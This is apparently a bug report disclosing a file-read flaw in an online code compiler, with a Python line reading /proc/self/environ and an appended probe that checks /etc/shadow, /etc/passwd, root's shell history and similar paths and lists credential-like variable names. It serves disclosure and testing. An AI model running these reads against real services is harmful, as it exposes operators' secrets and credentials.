Problem description:
Security issue identified while running code on the compiler, aka Local File Inclusion (LFI)
Expected behavior:
'permission denied' should be the expected behaviour, as the current behaviour exposes backend info and an adversary can run OS commands.
Actual behavior:
Displaying sensitive content
Steps to reproduce:
Run the code below and change the file name/path; the contents of that file will be displayed accordingly.
# Open the file in read mode
with open('/proc/self/environ', 'r') as file:
    # Read the contents of the file
    contents = file.read()
# Print the contents of the file
print(contents)
Bug appears at this link:
Browser/OS/Device:
Chrome browser/Win 11
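Added example (not part of the original report and not the compiler vendor's code): a probe that generalizes the reproduction steps above. Instead of dumping file contents, it checks a list of sensitive paths for readability and, if /proc/self/environ is readable, parses its NUL-separated records and reports only the names of variables that look like credentials. The path list and the name heuristic are assumptions chosen for illustration, and the probe assumes a Linux host.

```python
import os
from typing import Dict, Iterable, List

# Constructed list of paths worth probing in a code-execution sandbox
# (assumption: Linux host; extend as needed).
SENSITIVE_PATHS = [
    "/proc/self/environ",
    "/proc/self/cmdline",
    "/proc/self/cgroup",
    "/etc/passwd",
    "/etc/shadow",
    "/root/.bash_history",
]

# Heuristic substrings that suggest a variable holds a credential (assumption).
SECRET_HINTS = ("KEY", "SECRET", "TOKEN", "PASS", "CREDENTIAL")


def probe_path(path: str) -> str:
    """Return 'readable', 'denied', 'missing' or 'error' for a path.

    Only one byte is read, and nothing is printed, so the probe itself
    does not leak the file's contents.
    """
    try:
        with open(path, "rb") as f:
            f.read(1)
        return "readable"
    except PermissionError:
        return "denied"
    except FileNotFoundError:
        return "missing"
    except OSError:
        return "error"


def probe_paths(paths: Iterable[str]) -> Dict[str, str]:
    """Probe every path and map it to its readability status."""
    return {p: probe_path(p) for p in paths}


def parse_environ(raw: bytes) -> Dict[str, str]:
    """Parse the /proc/self/environ format: KEY=VALUE records separated by NUL."""
    env: Dict[str, str] = {}
    for rec in raw.split(b"\0"):
        if not rec:
            continue
        key, _, value = rec.partition(b"=")
        env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env


def suspicious_keys(env: Dict[str, str]) -> List[str]:
    """Sorted names of variables that look credential-bearing; values are never returned."""
    return sorted(k for k in env if any(h in k.upper() for h in SECRET_HINTS))


if __name__ == "__main__":
    for path, status in probe_paths(SENSITIVE_PATHS).items():
        print(f"{status:9} {path}")
    if probe_path("/proc/self/environ") == "readable":
        with open("/proc/self/environ", "rb") as f:
            env = parse_environ(f.read())
        print(f"environ readable: {len(env)} variables, "
              f"credential-like names: {suspicious_keys(env)}")
```

Run it inside the sandbox in question: a line reading `readable  /proc/self/environ` together with a non-empty list of credential-like names confirms the exposure the report describes without pasting secret values into a public ticket.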